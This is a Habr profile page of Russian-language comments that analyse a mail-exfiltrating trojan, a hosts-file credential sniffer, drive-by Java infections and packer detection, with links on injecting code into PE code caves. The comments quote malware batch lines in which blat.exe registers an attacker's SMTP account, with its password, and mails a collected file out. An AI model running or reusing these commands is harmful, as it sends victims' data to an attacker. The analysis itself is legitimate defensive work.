Pull to refresh
57
0
Дмитрий @Onthar

User

Send message
Шифровать он начинает в случае попыток анализа, чтобы нагадить, я пологаю. Основной его функционал все таки — перехват пост-запросов из браузеров.
blogs.cisco.com/wp-content/uploads/wireshark-wm.png
Конечно, на упаковщик сработал — тот еще герой)
Кстати, совсем забыл про RDG Packer Detector.
rdgsoft.8k.com/
Тоже постоянно обновляемая мощная тулза.
пароль на яндексе менять бесполезно — без ответа на q/a не возможно сменить серкетный вопрос, а следовательно возврат почты — дело одной минуты.

Аналог PEiD есть — это Exeinfo PE. Обновляется регулярно. В данный момент оф.сайт почему-то недоступен.
Есть в PE-файлах так называемые CodeCave так вот туда можно не только данные вписать, но и вполне рабочий ассемблерный код.
Есть статья на англицком: www2.inf.fh-bonn-rhein-sieg.de/~ikarim2s/how2injectcode/code_inject.html
И ее перевод: www.xaker.name/forvb/showthread.php?t=22158

Ну и хекс-редактором можно в пустые области записывать данные, это в секции ресурсов, как правило. Тут скорее от конкретного файла зависит. Я не особо разбирался с этим, если честно.
blat.exe -install -server smtp.yandex.ru -port 587 -f ufanetcom2@yandex.ru -u ufanetcom2 -pw javascriptscэто строка в батнике install.bat записывает в реестр аккаунт, с которого отсылается почта.
%SYSTEMROOT%/help/win32/blat.exe %systemroot%/help/win32/ip.txt -to ufanetcom2@yandex.ru. exitэта строка отправляет указанный файл на указанный адрес.
письмо отправилось на свой же ящик.

Да и просниффать можно элементарно, тут же нет ssl.
Не нравится мне переход на третий питон, когда последний раз «трогал» calculate — приходилось маскировать третью ветку. Тут как? третий питон уже в коробке?
Сайт злоумышленника лег под хабраэффектом))

Кстати из всей хвори, что выкачивают лоадеры, попался и сниффер учеток соц.сетей. До конца еще не разобрался, но похоже, что вредонос поднимает веб-сервер или прокси, пропускающую через себя траффик по определенным в файле hosts доменам. То есть в файле hosts нашел записи вида 127.0.0.1 vk.com, при этом сайты работают. А при вводе данных в поля авторизации происходит отправка содержимого форм «налево».

Отсюда и спам, отсюда и комментарии на стенах от знакомых людей.
peid, exe info pe вроде бы, нету сейчас возможности проверить.
Вполне возможно, что это фальшивая сигнатура.
Могут быть использованы так называемые drive-by атаки на браузер. Возможно, не совсем верно выразился, но я сталкивался с подобным. При переходе на сайт производится попытка запустить ява-апплет. Под виндой загрузка ява апплета включала видео-ролик, а на фоне скачивала и запускала трояна.
На ютуб я заливал демонстрацию этого безобразия: www.youtube.com/watch?v=G-JSVGCEML8
У меня были подозрения, что используется какой-то конвертер, вроде bat 2 exe и прочих, но руки перепробовать все пока что не дошли.
Поставил тачку жены обновляться, через пару часов поглядим, чем они нас порадуют.
На семерке вредонос запросит администраторских прав (UAC вылезет), а при открытии блокнота двойным кликом, он запускается с правами пользователя, прав у которого на правку системного файла не хватит. Так вот запускать его нужно правым кликом -> Запуск от имени администратора.
Собственно, это имелось виду, забыл уточнить.
во всяком случае, я ввел просто по нескольку единиц в поля.
При вводе рандомных символов уже предлогали сменить пароль. Проверки нету даже на наличие символа "@" в поле «Логин»

Information

Rating
Does not participate
Location
Россия
Date of birth
Registered
Activity